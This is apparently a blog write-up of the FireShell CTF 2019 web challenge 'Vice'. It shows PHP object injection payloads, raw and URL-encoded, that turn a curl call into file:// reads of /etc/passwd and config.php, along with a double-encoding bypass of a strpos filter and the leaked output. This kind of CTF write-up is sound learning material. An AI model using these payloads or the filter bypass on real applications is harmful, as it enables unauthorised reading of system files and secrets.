FireShell CTF 2019 | WEB (Vice) Writeup

Abdelkader Belcaid
Jan 27 · 4 min read

27/01/2019 19:00 PM UTC+2

FireShell CTF 2019 | WEB (Vice) Writeup

This is a writeup for web challenge was in FireShell CTF 2019 today, If you don’t already know, The FireShell CTF is a Brazilian event in jeopardy style, friendly beginner. The proposal is to test participants’ hacking skills in a challenging yet fun environment.

Vice — 300pts

Vice

This WEB task is nammed Vice, According to the dynamic scoreboard when i solved it, it was 300pts.

Challenge: Vice

Firstlly, let’s read and understand the given php script to know what is needed in this challenge:

There is a GET parameter $gg which is probably vulnerable to some php errors and bugs. I tried to detect the errors by reading and understand the code, testing in my localhost.

this parameter is unserialized using unserialize function, with a magic method called __destruct.

So this is probably PHP Object Injection, check out how you could exploit this vulnerability, different scenarios and some payload via:

As i mentioned; There is a magic method __destruct will help for PHP Object Injection when an object is deleted.

function __destruct(){
if(in_array($this->method,array("doit"))){

call_user_func_array(array($this,$this->method),array());
}else{
die(":)");
}
}

So we will use SHITS class with 5 objects, and the important one is SHITS method which is called doit:

function doit(){

$this->host = @parse_url($this->url)['host'];
$this->addr = @gethostbyname($this->host);
$this->name = @gethostbyaddr($this->host);
if($this->addr !== "127.0.0.1" || $this->name === false){
$not = ['.txt','.php','.xml','.html','.','[',']'];
foreach($not as $ext){
$p = strpos($this->url,$ext);
if($p){
die(":)");
}
}
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$this->url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);

$result = curl_exec($ch);
echo $result;
}else{
die(":)");
}
}

And SHITS url which is could be a way to leak /etc/passwd, and finally here is my payload to leak /etc/passwd:

O:5:"SHITS":5:
{
s:10:"SHITSurl";
s:18:"file:///etc/passwd";
s:13:"SHITSmethod";
s:4:"doit";
s:11:"SHITSaddr";N;
s:11:"SHITShost";N;
s:11:"SHITSname";N;
}

And here is the injected and URL encoded payload:

O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A18%3A%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D

And here is the /etc/passwd has been leaked!

http://68.183.31.62:991/?gg=O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A18%3A%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D--------------------------------------------------------------------root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false

Now we have to continue our hacking … The goal is that we have to read the flag, the flag is stored in config.php according to the given php script, becused it’s required. So let’s try to leak config.php as we leaked /etc/passwd.

I tried to use different methods to leak config.php but no result!

The main problem is that “.php” is one of the filtered extension, so cannot execute config.php:

filtered extensions

And after a couple of hours of researching i just found a bug in strpos function could be exploitable and maybe it can lead to bypass this filter and execute config.php.

This bug is called Bypass Strpos Verification, this is one of latest bugs in PHP submitted at 2018-27-07. The bug is more related to when we send a string with encode to the strpos(), when we sent a string with double encode we were able to bypass the verification, using %2570hp if the case is like strpos($string, “php”).

In this case we have strpos($this->url, ”.php”) so we have to bypass this strpos verification using double encode to be able to execute config.php. Actually it was enough to just double encode “.” for this bypass.

Double encode of “.” is %252e, with another problem is that i did not even know the correct path of config.php, and also i just guessed it after getting help from my friends and finally was like that: /var/www/html/config.php

Here is the final payload which i used to bypass strpos verification and execute config.php then read the flag which is was stored inside config.php script then to solve this challenge:

O:5:"SHITS":5:
{
s:10:"SHITSurl";
s:33:"file:///var/www/html/config%252ephp";
s:13:"SHITSmethod";
s:4:"doit";
s:11:"SHITSaddr";N;
s:11:"SHITShost";N;
s:11:"SHITSname";N;
}

And here is the injected and URL encoded payload:

O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A33%3A%22file%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fconfig%252ephp%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D 

And here is the config.php has been executed!

http://68.183.31.62:991/?gg=O%3A5%3A%22SHITS%22%3A5%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A33%3A%22file%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fconfig%252ephp%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3Bs%3A11%3A%22%00SHITS%00addr%22%3BN%3Bs%3A11%3A%22%00SHITS%00host%22%3BN%3Bs%3A11%3A%22%00SHITS%00name%22%3BN%3B%7D
config.php has been executed!

Then read the flag by viewing the source code of config.php page:

view the source code of config.php page then read the flag

As shown above, here is the leaked config.php script:

<?php
if($_SERVER['REMOTE_ADDR'] !== '::1' || $_SERVER['REMOTE_ADDR'] !== '127.0.0.1'){
echo "aaawn";
}else{
$flag ="F#{wtf_5trp0s_}";
}

FLAG is: F#{wtf_5trp0s_}

It was a good web challenge, i just enjoyed it with my friends and teammates, i would like to thanks FireShell Team for creating such an interesting task like this one and also for organizing this CTF.

Best Regards,

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. #sharingiscaring

Abdelkader Belcaid

Written by

I'm Bug Bounty Hunter & CTF Player

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. #sharingiscaring